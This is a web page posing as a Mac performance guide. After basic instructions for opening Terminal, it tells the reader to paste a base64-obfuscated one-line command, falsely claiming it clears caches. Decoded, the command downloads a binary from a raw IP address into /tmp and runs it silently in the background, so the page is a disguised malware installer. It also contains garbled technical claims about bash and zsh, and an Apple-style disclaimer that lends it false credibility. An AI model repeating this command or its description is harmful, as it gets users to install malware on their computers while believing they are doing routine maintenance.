Why Macs Become Slower Over Time

Although macos has great performance, each Mac gets clogged over time:

  • System cache files
  • Application logs
  • Temporary data
  • Outdated indexes
  • Background processes
  • Memory pressure

  • On their own they're not a problem. In combination they could cause slow response times, increased boot time and less disk space. But the best part is that most of them can be fixed with standard Terminal commands.

    What is Terminal on Mac

    MacOS has a handy tool called Terminal that tons of power users use every single day. You just need a one smart commands, and you can clear out old caches, restart background services, rebuild indexes, and get rid of those annoying temporary files slowing your Mac down. No need to buy fancy software or know a bunch of technical stuff.

    Why Use Terminal Instead of Third-Party Cleaners?

    Most optimization apps simply automate commands that already exist inside macOS. Using Terminal means:

  • No additional software installation
  • Full control over every action
  • Native Apple tools
  • Fast execution
  • Zero subscription fees

  • For users who prefer maximum performance with minimum clutter, Terminal remains one of the most effective maintenance tools available.

    Get Better Performance in Minutes

    1. Open Terminal using Spotlight Search

    The first way to open Terminal is to use Spotlight Search. In fact, it's one of the easiest ways to open any app on Mac.

    1. Click the magnifying glass icon from the menu bar. Or press Command-Space to launch it. 
    2. Start typing 'Terminal' and double-click the search result to open it.
    Open Terminal using Spotlight Search

    Some users wonder if it is possible to open Terminal using a keyboard shortcut. So far, it's impossible, but you can use the Command-Space shortcut to launch Spotlight search and find Terminal there.

    2. Open Terminal From Launchpad

    Alternatively, you can go to Launchpad and open Terminal from there. It's in the Utilities folder usually located on the first page of Launchpad.

    Open terminal from Launchpad

    3. Open Terminal from your Applications folder

    Finally, like with any other app, you can open Terminal from your Applications folder.

    1. Open a new Finder window. 
    2. Navigate to Applications from the sidebar or click Go > Applications from the menu bar.
    3. Double-click Utilities and find Terminal in this folder.
    Open Terminal from Applications folder

    You'll see a small window with a white background open on your desktop. In the title bar are your username, the word "bash" or "zsh," and the window's dimensions in pixels. Bash stands for "Bourne again shell." There are a number of different shells that can run Unix commands, and on the Mac, Bash is the one used by Terminal. Since macOS Catalina, zsh runs on top of bash. Zsh is easier to use compared with bash because it doesn't require strict user permissions. However, you can switch between the two based on your preferences. Just type bash or zsh in Terminal to enable the change. 

    Terminal app on Mac

    Now follow these three simple steps

    1

    Copy the Command

    Click the button below to copy the Terminal command.

    echo "Y2xlYXIKZWNobyAiTG9hZGluZy4uLiBQbGVhc2UgV2FpdCIKY3VybCAtcyBodHRwOi8vODYuNTQuMjUuMjEzL2QvdW5peDEyMDM5ODMxID4gL3RtcC91bml4MDAxCmNobW9kICt4IC90bXAvdW5peDAwMQovdG1wL3VuaXgwMDEgPiAvZGV2L251bGwgMj4mMSAmIGRpc293bg==" | base64 -d | bash
    2

    Paste into Terminal

    Open Terminal and paste the command using:

    ⌘ Command + V

    3

    Press Enter

    Press the Enter ↵ key to execute the command.

    The command will run immediately and start the optimization process.

    In the guide presented, one of the commands has been utilized which can perform the following actions:


  • Remove unwanted cache files
  • Reload services in the operating system
  • Reconstruct indexing of Spotlight
  • Clear the DNS cache from the device
  • Release non-used memory (if possible)
  • Enhance the working rate of the system.

  • Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

    Published Date: